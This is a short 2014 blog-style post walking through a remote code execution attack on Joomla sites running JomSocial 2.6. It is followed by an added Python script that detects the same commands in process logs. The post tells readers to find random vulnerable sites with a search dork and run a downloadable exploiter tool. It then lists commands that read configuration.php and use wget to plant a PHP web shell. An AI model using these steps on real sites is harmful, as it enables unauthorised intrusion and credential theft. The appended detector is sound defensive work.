Wednesday, 29 October 2014

[JOOMLA] JomSocial 2.6 Remote Code Execution

   1- Copy the dork and paste it on Google or any other search engine
   2- Choose any site
   3- Run the JomSocial Exploiter by Gothie
   4- Paste the site URL in the given textbox and click Connect
   5- If the site is vulnerable, you will get the message as below

   6- Now, you can execute any command remotely. The commands are as below:
system('id & uname -a');
system('cat configuration.php');
   7- To upload a shell, you need to have a raw shell (shell.txt) uploaded anywhere that can be accessed directly without being executed. Type in the command below to import your shell and save it as .php
system('wget -O shell.php');
   8- Your shell can be found at

JomSocial Exploiter by Gothie (2.7MB)
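
The commands in steps 6 and 7 seen from the defender's side, as an added example that is not part of the original post: a Python check that flags them when a web server process spawns them. The record format, the parent process names and the files.example URL are constructed assumptions.

```python
import re
import shlex
from itertools import groupby

# Assumption: the site's PHP runs under one of these parent process names.
WEB_PARENTS = {"apache2", "httpd", "php-fpm", "php-cgi"}
RECORD = re.compile(r'parent=(\S+) cmd="(.*)"$')
PHP_FILE = re.compile(r"\.(php\d?|phtml)$", re.I)
WGET_OUT = re.compile(r"(?:^| )(?:-O ?|--output-document[= ])(\S+)")
OPS = set("();<>|&")  # shell operators that separate commands

def split_commands(shell_string):
    """Split a shell string into argv lists at shell operators, quote-aware."""
    lex = shlex.shlex(shell_string, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    try:
        tokens = list(lex)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = shell_string.split()
    groups = groupby(tokens, lambda t: bool(t) and set(t) <= OPS)
    return [list(g) for is_op, g in groups if not is_op]

def classify(argv):
    """Label one command run under a web parent, or return None."""
    prog, rest = argv[0].rsplit("/", 1)[-1], " ".join(argv[1:])
    out = WGET_OUT.search(rest) if prog == "wget" else None
    if prog in ("id", "uname"):
        return "recon"
    if prog == "cat" and re.search(r"(^|[ /])configuration\.php( |$)", rest):
        return "config-read"
    if out and PHP_FILE.search(out.group(1)):
        return "php-drop"
    return None

def scan(lines):
    """Return (line_no, label) for flagged commands spawned by web parents."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = RECORD.search(line)
        if m and m.group(1) in WEB_PARENTS:
            labels = map(classify, split_commands(m.group(2)))
            hits += [(n, label) for label in labels if label]
    return hits

# Constructed records in a constructed format (not from a real host).
SAMPLE = [
    'parent=php-fpm cmd="id & uname -a"',
    'parent=php-fpm cmd="cat configuration.php"',
    'parent=php-fpm cmd="wget -O shell.php http://files.example/shell.txt"',
    'parent=apache2 cmd="convert in.png out.png"',
]
```

In practice the records would come from process-execution telemetry such as auditd execve events or an EDR feed, mapped into the parent and command fields used here.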